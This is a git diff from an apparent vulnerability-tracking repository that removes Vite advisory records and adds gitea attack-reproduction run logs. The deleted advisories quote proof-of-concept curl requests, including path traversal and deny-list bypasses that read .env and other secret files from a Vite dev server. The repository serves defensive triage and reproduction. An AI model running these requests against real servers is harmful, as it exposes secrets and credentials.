-    "6.0.15",
-    "5.4.18",
-    "4.5.13"
-  ],
-  "package_name": "vite",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-32395.md",
-  "secure_code_topics": [
-    "dependency-upgrade-policy",
-    "file-upload-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Vite"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-46565.json b/08-threat-intel/registry/advisories/vite--CVE-2025-46565.json
deleted file mode 100644
index 43340ead..00000000
--- a/08-threat-intel/registry/advisories/vite--CVE-2025-46565.json
+++ /dev/null
@@ -1,80 +0,0 @@
-{
-  "canonical_id": "vite--CVE-2025-46565",
-  "system_id": "vite",
-  "display_name": "Vite",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Vite's server.fs.deny bypassed with /. for files under project root",
-  "summary": "### Summary\nThe contents of files in [the project `root`](https://vite.dev/config/shared-options.html#root) that are denied by a file matching pattern can be returned to the browser.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\nOnly files that are under [project `root`](https://vite.dev/config/shared-options.html#root) and are denied by a file matching pattern can be bypassed.\n\n- Examples of file matching patterns: `.env`, `.env.*`, `*.{crt,pem}`, `**/.env`\n- Examples of other patterns: `**/.git/**`, `.git/**`, `.git/**/*`\n\n### Details\n[`server.fs.deny`](https://vite.dev/config/server-options.html#server-fs-deny) can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns).\nThese patterns were able to bypass for files under `root` by using a combination of slash and dot (`/.`).\n\n### PoC\n```\nnpm create vite@latest\ncd vite-project/\ncat \"secret\" > .env\nnpm install\nnpm run dev\ncurl --request-target /.env/. http://localhost:5173\n```\n\n![image](https://github.com/user-attachments/assets/822f4416-aa42-461f-8c95-a88d155e674b)\n![image](https://github.com/user-attachments/assets/42902144-863a-4afb-ac5b-fc16effa37cc)",
-  "published_at": "2025-04-30T17:40:27Z",
-  "updated_at": "2026-02-04T03:27:17.681639Z",
-  "severity": "medium",
-  "cvss_score": 4.0,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-859w-5945-r5v3",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-46565",
-    "https://github.com/vitejs/vite/commit/c22c43de612eebb6c182dd67850c24e4fab8cacb",
-    "https://github.com/vitejs/vite"
-  ],
-  "aliases": [
-    "CVE-2025-46565",
-    "GHSA-859w-5945-r5v3"
-  ],
-  "cve_ids": [
-    "CVE-2025-46565"
-  ],
-  "ghsa_ids": [
-    "GHSA-859w-5945-r5v3"
-  ],
-  "osv_ids": [
-    "GHSA-859w-5945-r5v3"
-  ],
-  "affected_versions": [
-    "introduced=6.3.0, fixed<6.3.4",
-    "introduced=6.2.0, fixed<6.2.7",
-    "introduced=6.0.0, fixed<6.1.6",
-    "introduced=5.0.0, fixed<5.4.19",
-    "introduced=0, fixed<4.5.14"
-  ],
-  "fixed_versions": [
-    "6.3.4",
-    "6.2.7",
-    "6.1.6",
-    "5.4.19",
-    "4.5.14"
-  ],
-  "package_name": "vite",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-46565.md",
-  "secure_code_topics": [
-    "dependency-upgrade-policy",
-    "file-upload-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "file-upload-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Vite"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-58751.json b/08-threat-intel/registry/advisories/vite--CVE-2025-58751.json
deleted file mode 100644
index 8163ca21..00000000
--- a/08-threat-intel/registry/advisories/vite--CVE-2025-58751.json
+++ /dev/null
@@ -1,82 +0,0 @@
-{
-  "canonical_id": "vite--CVE-2025-58751",
-  "system_id": "vite",
-  "display_name": "Vite",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Vite middleware may serve files starting with the same name with the public directory",
-  "summary": "### Summary\nFiles starting with the same name with the public directory were served bypassing the `server.fs` settings.\n\n### Impact\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host))\n- uses [the public directory feature](https://vite.dev/guide/assets.html#the-public-directory) (enabled by default)\n- a symlink exists in the public directory\n\n### Details\nThe [servePublicMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L79) function is in charge of serving public files from the server. It returns the [viteServePublicMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L106) function which runs the needed tests and serves the page. The viteServePublicMiddleware function [checks if the publicFiles variable is defined](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L111), and then uses it to determine if the requested page is public. In the case that the publicFiles is undefined, the code will treat the requested page as a public page, and go on with the serving function. [publicFiles may be undefined if there is a symbolic link anywhere inside the public directory](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/publicDir.ts#L21). In that case, every requested page will be passed to the public serving function. The serving function is based on the [sirv](https://github.com/lukeed/sirv) library. Vite patches the library to add the possibility to test loading access to pages, but when the public page middleware [disables this functionality](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L89) since public pages are meant to be available always, regardless of whether they are in the allow or deny list.\n\nIn the case of public pages, the serving function is [provided with the path to the public directory](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L85) as a root directory. The code of the sirv library [uses the join function to get the full path to the requested file](https://github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L42). For example, if the public directory is \"/www/public\", and the requested file is \"myfile\", the code will join them to the string \"/www/public/myfile\". The code will then pass this string to the normalize function. Afterwards, the code will [use the string's startsWith function](https://github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L43) to determine whether the created path is within the given directory or not. Only if it is, it will be served.\n\nSince [sirv trims the trailing slash of the public directory](https://github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L119), the string's startsWith function may return true even if the created path is not within the public directory. For example, if the server's root is at \"/www\", and the public directory is at \"/www/p\", if the created path will be \"/www/private.txt\", the startsWith function will still return true, because the string \"/www/private.txt\" starts with\u00a0 \"/www/p\". To achieve this, the attacker will use \"..\" to ask for the file \"../private.txt\". The code will then join it to the \"/www/p\" string, and will receive \"/www/p/../private.txt\". Then, the normalize function will return \"/www/private.txt\", which will then be passed to the startsWith function, which will return true, and the processing of the page will continue without checking the deny list (since this is the public directory middleware which doesn't check that).\n\n### PoC\nExecute the following shell commands:\n\n```\nnpm  create  vite@latest\ncd vite-project/\nmkdir p\ncd p\nln -s a b\ncd ..\necho  'import path from \"node:path\"; import { defineConfig } from \"vite\"; export default defineConfig({publicDir: path.resolve(__dirname, \"p/\"), server: {fs: {deny: [path.resolve(__dirname, \"private.txt\")]}}})' > vite.config.js\necho  \"secret\" > private.txt\nnpm install\nnpm run dev\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/private.txt'`\n\nYou will receive a 403 HTTP Response,\u00a0 because private.txt is denied.\n\nNow in the same shell run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/../private.txt'`\n\nYou will receive the contents of private.txt.\n\n### Related links\n- https://github.com/lukeed/sirv/commit/f0113f3f8266328d804ee808f763a3c11f8997eb",
-  "published_at": "2025-09-09T20:55:56Z",
-  "updated_at": "2026-02-04T04:33:22.508417Z",
-  "severity": "medium",
-  "cvss_score": 4.0,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-g4jq-h2w9-997c",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-58751",
-    "https://github.com/lukeed/sirv/commit/f0113f3f8266328d804ee808f763a3c11f8997eb",
-    "https://github.com/vitejs/vite/commit/09f2b52e8d5907f26602653caf41b3a56692600d",
-    "https://github.com/vitejs/vite/commit/4f1c35bcbb5830290c694aa14b6789e07450f069",
-    "https://github.com/vitejs/vite/commit/63e2a5d232218f3f8d852056751e609a5367aaec",
-    "https://github.com/vitejs/vite/commit/e11d24008b97d4ca731ecc1a3b95260a6d12e7e0",
-    "https://github.com/vitejs/vite"
-  ],
-  "aliases": [
-    "CVE-2025-58751",
-    "GHSA-g4jq-h2w9-997c"
-  ],
-  "cve_ids": [
-    "CVE-2025-58751"
-  ],
-  "ghsa_ids": [
-    "GHSA-g4jq-h2w9-997c"
-  ],
-  "osv_ids": [
-    "GHSA-g4jq-h2w9-997c"
-  ],
-  "affected_versions": [
-    "introduced=7.1.0, fixed<7.1.5",
-    "introduced=7.0.0, fixed<7.0.7",
-    "introduced=6.0.0, fixed<6.3.6",
-    "introduced=0, fixed<5.4.20"
-  ],
-  "fixed_versions": [
-    "7.1.5",
-    "7.0.7",
-    "6.3.6",
-    "5.4.20"
-  ],
-  "package_name": "vite",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-58751.md",
-  "secure_code_topics": [
-    "dependency-upgrade-policy",
-    "file-upload-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Vite"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-58752.json b/08-threat-intel/registry/advisories/vite--CVE-2025-58752.json
deleted file mode 100644
index ce1360c2..00000000
--- a/08-threat-intel/registry/advisories/vite--CVE-2025-58752.json
+++ /dev/null
@@ -1,83 +0,0 @@
-{
-  "canonical_id": "vite--CVE-2025-58752",
-  "system_id": "vite",
-  "display_name": "Vite",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Vite's `server.fs` settings were not applied to HTML files",
-  "summary": "### Summary\nAny HTML files on the machine were served regardless of the `server.fs` settings.\n\n### Impact\n\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))\n- `appType: 'spa'` (default) or `appType: 'mpa'` is used\n\nThis vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served.\n\n### Details\nThe [serveStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L123) function is in charge of serving static files from the server. It returns the [viteServeStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L136) function which runs the needed tests and serves the page. The viteServeStaticMiddleware function [checks if the extension of the requested file is \".html\"](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L144). If so, it doesn't serve the page. Instead, the server will go on to the next middlewares, in this case [htmlFallbackMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/htmlFallback.ts#L14), and then to [indexHtmlMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/indexHtml.ts#L438). These middlewares don't perform any test against allow or deny rules, and they don't make sure that the accessed file is in the root directory of the server. They just find the file and send back its contents to the client.\n\n### PoC\nExecute the following shell commands:\n\n```\nnpm  create  vite@latest\ncd vite-project/\necho  \"secret\" > /tmp/secret.html\nnpm install\nnpm run dev\n```\n\nThen, in a different shell, run the following command:\n\n`curl  -v  --path-as-is  'http://localhost:5173/../../../../../../../../../../../tmp/secret.html'`\n\nThe contents of /tmp/secret.html will be returned.\n\nThis will also work for HTML files that are in the root directory of the project, but are in the deny list (or not in the allow list). Test that by stopping the running server (CTRL+C), and running the following commands in the server's shell:\n\n```\necho  'import path from \"node:path\"; import { defineConfig } from \"vite\"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, \"secret_files/*\")]}}})'  >  [vite.config.js](http://vite.config.js)\nmkdir secret_files\necho \"secret txt\" > secret_files/secret.txt\necho \"secret html\" > secret_files/secret.html\nnpm run dev\n\n```\n\nThen, in a different shell, run the following command:\n\n`curl  -v  --path-as-is  'http://localhost:5173/secret_files/secret.txt'`\n\nYou will receive a 403 HTTP Response,\u00a0 because everything in the secret_files directory is denied.\n\nNow in the same shell run the following command:\n\n`curl  -v  --path-as-is  'http://localhost:5173/secret_files/secret.html'`\n\nYou will receive the contents of secret_files/secret.html.",
-  "published_at": "2025-09-09T20:54:42Z",
-  "updated_at": "2026-02-04T04:35:16.287471Z",
-  "severity": "medium",
-  "cvss_score": 4.0,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-jqfw-vq24-v9c3",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-58752",
-    "https://github.com/vitejs/vite/commit/0ab19ea9fcb66f544328f442cf6e70f7c0528d5f",
-    "https://github.com/vitejs/vite/commit/14015d794f69accba68798bd0e15135bc51c9c1e",
-    "https://github.com/vitejs/vite/commit/482000f57f56fe6ff2e905305100cfe03043ddea",
-    "https://github.com/vitejs/vite/commit/6f01ff4fe072bcfcd4e2a84811772b818cd51fe6",
-    "https://github.com/vitejs/vite",
-    "https://github.com/vitejs/vite/blob/v7.1.5/packages/vite/CHANGELOG.md"
-  ],
-  "aliases": [
-    "CVE-2025-58752",
-    "GHSA-jqfw-vq24-v9c3"
-  ],
-  "cve_ids": [
-    "CVE-2025-58752"
-  ],
-  "ghsa_ids": [
-    "GHSA-jqfw-vq24-v9c3"
-  ],
-  "osv_ids": [
-    "GHSA-jqfw-vq24-v9c3"
-  ],
-  "affected_versions": [
-    "introduced=7.1.0, fixed<7.1.5",
-    "introduced=7.0.0, fixed<7.0.7",
-    "introduced=6.0.0, fixed<6.3.6",
-    "introduced=0, fixed<5.4.20"
-  ],
-  "fixed_versions": [
-    "7.1.5",
-    "7.0.7",
-    "6.3.6",
-    "5.4.20"
-  ],
-  "package_name": "vite",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-58752.md",
-  "secure_code_topics": [
-    "dependency-upgrade-policy",
-    "file-upload-validation",
-    "proxy-trust-boundary",
-    "plugin-extension-trust-policy"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Vite"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-62522.json b/08-threat-intel/registry/advisories/vite--CVE-2025-62522.json
deleted file mode 100644
index d9f30800..00000000
--- a/08-threat-intel/registry/advisories/vite--CVE-2025-62522.json
+++ /dev/null
@@ -1,81 +0,0 @@
-{
-  "canonical_id": "vite--CVE-2025-62522",
-  "system_id": "vite",
-  "display_name": "Vite",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "vite allows server.fs.deny bypass via backslash on Windows",
-  "summary": "### Summary\nFiles denied by [`server.fs.deny`](https://vitejs.dev/config/server-options.html#server-fs-deny) were sent if the URL ended with `\\` when the dev server is running on Windows.\n\n### Impact\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host))\n- running the dev server on Windows\n\n### Details\n`server.fs.deny` can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns). These patterns were able to bypass by using a back slash(`\\`). The root cause is that `fs.readFile('/foo.png/')` loads `/foo.png`.\n\n### PoC\n```shell\nnpm create vite@latest\ncd vite-project/\ncat \"secret\" > .env\nnpm install\nnpm run dev\ncurl --request-target /.env\\ http://localhost:5173\n```\n<img width=\"1593\" height=\"616\" alt=\"image\" src=\"https://github.com/user-attachments/assets/36212f4e-1d3c-4686-b16f-16b35ca9e175\" />",
-  "published_at": "2025-10-20T19:54:28Z",
-  "updated_at": "2026-02-04T04:13:38.886554Z",
-  "severity": "medium",
-  "cvss_score": 4.0,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-93m4-6634-74q7",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-62522",
-    "https://github.com/vitejs/vite/commit/f479cc57c425ed41ceb434fecebd63931b1ed4ed",
-    "https://github.com/vitejs/vite"
-  ],
-  "aliases": [
-    "CVE-2025-62522",
-    "GHSA-93m4-6634-74q7"
-  ],
-  "cve_ids": [
-    "CVE-2025-62522"
-  ],
-  "ghsa_ids": [
-    "GHSA-93m4-6634-74q7"
-  ],
-  "osv_ids": [
-    "GHSA-93m4-6634-74q7"
-  ],
-  "affected_versions": [
-    "introduced=7.1.0, fixed<7.1.11",
-    "introduced=7.0.0, fixed<7.0.8",
-    "introduced=6.0.0, fixed<6.4.1",
-    "introduced=2.9.18, fixed<5.4.21",
-    "introduced=3.2.9, fixed<5.4.21",
-    "introduced=4.5.3, fixed<5.4.21",
-    "introduced=5.2.6, fixed<5.4.21"
-  ],
-  "fixed_versions": [
-    "7.1.11",
-    "7.0.8",
-    "6.4.1",
-    "5.4.21"
-  ],
-  "package_name": "vite",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-62522.md",
-  "secure_code_topics": [
-    "dependency-upgrade-policy",
-    "file-upload-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "file-upload-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Vite"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/runs/gitea-gitea--CVE-2018-15192-20260318012749.json b/08-threat-intel/registry/runs/gitea-gitea--CVE-2018-15192-20260318012749.json
new file mode 100644
index 00000000..608bc45a
--- /dev/null
+++ b/08-threat-intel/registry/runs/gitea-gitea--CVE-2018-15192-20260318012749.json
@@ -0,0 +1,145 @@
+{
+  "run_id": "gitea-gitea--CVE-2018-15192-20260318012749",
+  "system_id": "gitea",
+  "advisory_id": "gitea--CVE-2018-15192",
+  "repro_profile_id": "gitea-ssrf",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.ssrf",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json"
+    }
+  ],
+  "browser_refs": [],
+  "browser_evidence": {
+    "required": false,
+    "present": false,
+    "refs": [],
+    "baseline_refs": [],
+    "proof_refs": [],
+    "baseline_title": null,
+    "proof_title": null,
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:27:49+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "gitea--CVE-2018-15192"
+    },
+    {
+      "at": "2026-03-18T01:27:49+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "gitea-ssrf"
+    },
+    {
+      "at": "2026-03-18T01:27:49+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:27:52+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:27:52+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:27:52+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:27:52+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:27:52+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:27:52+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:27:54+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:27:54+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "gitea-gitea--CVE-2018-15192-20260318012749"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "server-side callback reached the local sink"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:27:49+00:00",
+  "finished_at": "2026-03-18T01:27:54+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/timeline.mmd"
+  }
+}
diff --git a/08-threat-intel/registry/runs/gitea-gitea--CVE-2018-18926-20260318012526.json b/08-threat-intel/registry/runs/gitea-gitea--CVE-2018-18926-20260318012526.json
new file mode 100644
index 00000000..255a769d
--- /dev/null
+++ b/08-threat-intel/registry/runs/gitea-gitea--CVE-2018-18926-20260318012526.json
@@ -0,0 +1,197 @@
+{
+  "run_id": "gitea-gitea--CVE-2018-18926-20260318012526",
+  "system_id": "gitea",
+  "advisory_id": "gitea--CVE-2018-18926",
+  "repro_profile_id": "gitea-proxy-boundary",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.proxy-boundary",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json"
+    }
+  ],
+  "browser_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
+  ],
+  "browser_evidence": {
+    "required": true,
+    "present": true,
+    "refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json"
+    ],
+    "proof_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
